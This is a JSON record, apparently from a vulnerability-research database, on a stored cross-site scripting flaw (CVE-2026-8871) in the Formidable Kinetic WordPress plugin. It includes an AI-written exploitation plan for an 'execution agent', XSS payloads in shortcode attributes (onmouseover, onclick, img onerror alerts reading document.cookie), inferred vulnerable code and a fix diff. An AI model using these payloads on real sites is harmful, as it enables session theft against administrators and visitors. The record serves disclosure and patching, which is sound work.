[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwX7NhQKmPu8EHVJGPmfe6uh-m3hYEioOFdIPuInb3Ow":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-8871","formidable-kinetic-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","Formidable Kinetic \u003C= 1.1.01 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The Formidable Kinetic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'kinetic_link' shortcode in versions up to, and including, 1.1.01. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes (notably 'window', 'class', and 'label') in the FrmKinetic::link() function, which are concatenated directly into HTML attributes of an anchor tag. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","formidable-kinetic",null,"\u003C=1.1.01","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-26 17:25:45","2026-05-27 05:31:26",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6f849ec6-1c90-4f98-a367-fea87ddc5870?source=api-prod",[],"researched",false,3,"This research plan outlines the steps required to analyze and exploit **CVE-2026-8871**, a Stored Cross-Site Scripting (XSS) vulnerability in the **Formidable Kinetic** plugin.\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Authenticated (Contributor+) Stored XSS.\n*   **Vulnerable Component:** The `kinetic_link` shortcode.\n*   **Vulnerable Function:** `FrmKinetic::link()` (inferred).\n*   **Root Cause:** The plugin fails to sanitize or escape user-provided shortcode attributes (`window`, `class`, and `label`) before concatenating them into the HTML output of an anchor (`\u003Ca>`) tag. Because shortcode attributes are not automatically escaped by WordPress, they must be escaped at the point of output (the \"sink\").\n\n### 2. Attack Vector Analysis\n*   **Required Role:** Contributor, Author, Editor, or Administrator. (Contributor is the lowest level capable of creating posts).\n*   **Injection Point:** Post or Page content via the `[kinetic_link]` shortcode.\n*   **Payload Carrier:** Shortcode attributes: `window`, `class`, and `label`.\n*   **Preconditions:** The plugin must be active. A post containing the malicious shortcode must be published or previewed.\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the shortcode in the `init` hook:\n    `add_shortcode('kinetic_link', array('FrmKinetic', 'link'));`\n2.  **Input Handling:** When a post is viewed, WordPress parses the shortcode and passes an `$atts` array to `FrmKinetic::link($atts)`.\n3.  **Vulnerable Processing:** The function likely constructs an HTML string similar to:\n    ```php\n    \u002F\u002F Inferred logic inside FrmKinetic::link()\n    $output = '\u003Ca class=\"' . $atts['class'] . '\" target=\"' . $atts['window'] . '\">' . $atts['label'] . '\u003C\u002Fa>';\n    return $output;\n    ```\n4.  **Sink:** The unescaped `$output` is returned and rendered in the browser.\n\n### 4. Nonce Acquisition Strategy\nWhile the vulnerability itself is triggered during rendering, the **injection** phase (creating\u002Fupdating a post) via HTTP requires a WordPress nonce if done through the standard `wp-admin` interface or the REST API.\n\n**Strategy for the Execution Agent:**\n1.  **Authentication:** Log in to WordPress as a Contributor.\n2.  **Access Post Editor:** Navigate to `wp-admin\u002Fpost-new.php`.\n3.  **Extract Nonce:**\n    *   If using the Classic Editor, extract the value of the hidden input `name=\"_wpnonce\"`.\n    *   If using the Block Editor (Gutenberg), the agent should use `browser_eval` to fetch the REST API nonce:\n        `browser_eval(\"wpApiSettings.nonce\")`\n4.  **Use the Nonce:** Include this nonce in the `X-WP-Nonce` header (for REST API) or the `_wpnonce` POST body parameter (for standard form submission).\n\n### 5. Exploitation Strategy\nThe goal is to inject an XSS payload that executes in the context of any user (including Administrators) who views the post.\n\n#### Step 1: Create a Malicious Post (HTTP Request)\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts` (REST API)\n*   **Headers:**\n    *   `Content-Type: application\u002Fjson`\n    *   `X-WP-Nonce: \u003Cextracted_nonce>`\n*   **Payload (JSON):**\n    ```json\n    {\n      \"title\": \"Kinetic Test\",\n      \"status\": \"publish\",\n      \"content\": \"[kinetic_link window='\\\" onmouseover=\\\"alert(document.cookie)\\\"' class='test' label='Click Me']\"\n    }\n    ```\n    *Alternative Attribute Payloads:*\n    *   `window`: `' onclick='alert(1)'` (Break out of the `target` attribute).\n    *   `label`: `\u003Cimg src=x onerror=alert(1)>` (Direct HTML injection if the label isn't escaped).\n\n#### Step 2: Trigger the XSS\n*   Navigate to the URL of the newly created post (returned in the Step 1 response).\n*   The script will execute when the page loads (if using the `label` payload) or when a user interacts with the link (if using the `window` or `class` payloads).\n\n### 6. Test Data Setup\n1.  **Plugin Installation:** Ensure `formidable-kinetic` version `\u003C= 1.1.01` is installed and active.\n2.  **User Creation:** Create a user with the `contributor` role.\n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n\n### 7. Expected Results\n*   The rendered HTML source of the post should contain:\n    `\u003Ca class=\"test\" target=\"\" onmouseover=\"alert(document.cookie)\">Click Me\u003C\u002Fa>`\n*   When an Administrator views the post and hovers over the link, a JavaScript alert displaying their cookies should appear.\n\n### 8. Verification Steps\n1.  **Check Post Content:** Use WP-CLI to verify the shortcode is stored.\n    `wp post get \u003Cpost_id> --field=post_content`\n2.  **Verify Raw Output:** Fetch the post HTML via HTTP and grep for the unescaped payload.\n    `http_request('GET', 'http:\u002F\u002F\u003Ctarget>\u002F?p=\u003Cpost_id>')`\n    *Look for:* `onmouseover=\"alert`\n\n### 9. Alternative Approaches\n*   **Bypassing `shortcode_atts`:** Even if the developer used `shortcode_atts()` to define defaults, that function does **not** sanitize the values. The vulnerability remains if the output is not escaped.\n*   **Bypassing `esc_html`:** If the developer only used `esc_html()` on the entire string but forgot to use `esc_attr()` on individual attributes, it might still be possible to break out of attributes using single quotes (`'`) if the attributes are wrapped in double quotes (or vice versa).\n*   **Gutenberg Blocks:** If Formidable Kinetic uses blocks instead of or in addition to shortcodes, the same function `FrmKinetic::link()` might be reused for the block's render callback, making it vulnerable in the same way.","The Formidable Kinetic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'kinetic_link' shortcode in versions up to 1.1.01. This occurs because the plugin fails to sanitize or escape shortcode attributes like 'window', 'class', and 'label' before concatenating them into an HTML anchor tag, allowing contributors to inject arbitrary JavaScript.","\u002F\u002F formidable-kinetic\u002Fclasses\u002FFrmKinetic.php (inferred path)\npublic static function link($atts) {\n    $atts = shortcode_atts(array(\n        'window' => '',\n        'class'  => '',\n        'label'  => '',\n    ), $atts);\n\n    \u002F\u002F Vulnerable: concatenation without output escaping\n    $output = '\u003Ca class=\"' . $atts['class'] . '\" target=\"' . $atts['window'] . '\">' . $atts['label'] . '\u003C\u002Fa>';\n    return $output;\n}","--- classes\u002FFrmKinetic.php\n+++ classes\u002FFrmKinetic.php\n@@ -2,5 +2,5 @@\n public static function link($atts) {\n     $atts = shortcode_atts(array(\n         'window' => '',\n         'class'  => '',\n         'label'  => '',\n     ), $atts);\n-    $output = '\u003Ca class=\"' . $atts['class'] . '\" target=\"' . $atts['window'] . '\">' . $atts['label'] . '\u003C\u002Fa>';\n+    $output = '\u003Ca class=\"' . esc_attr($atts['class']) . '\" target=\"' . esc_attr($atts['window']) . '\">' . esc_html($atts['label']) . '\u003C\u002Fa>';\n     return $output;\n }","To exploit this vulnerability, an attacker must have at least Contributor-level privileges to create or edit posts. The attacker inserts a [kinetic_link] shortcode into a post with a payload designed to break out of HTML attributes. For example, using [kinetic_link window='\" onmouseover=\"alert(document.cookie)\"' label='Click Here'] will result in the injection of an 'onmouseover' event handler into the rendered anchor tag. When any user, including an administrator, views the post and hovers over the link, the malicious JavaScript executes in their browser context.","gemini-3-flash-preview","2026-06-04 18:47:10","2026-06-04 18:47:50",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fformidable-kinetic\u002Ftags"]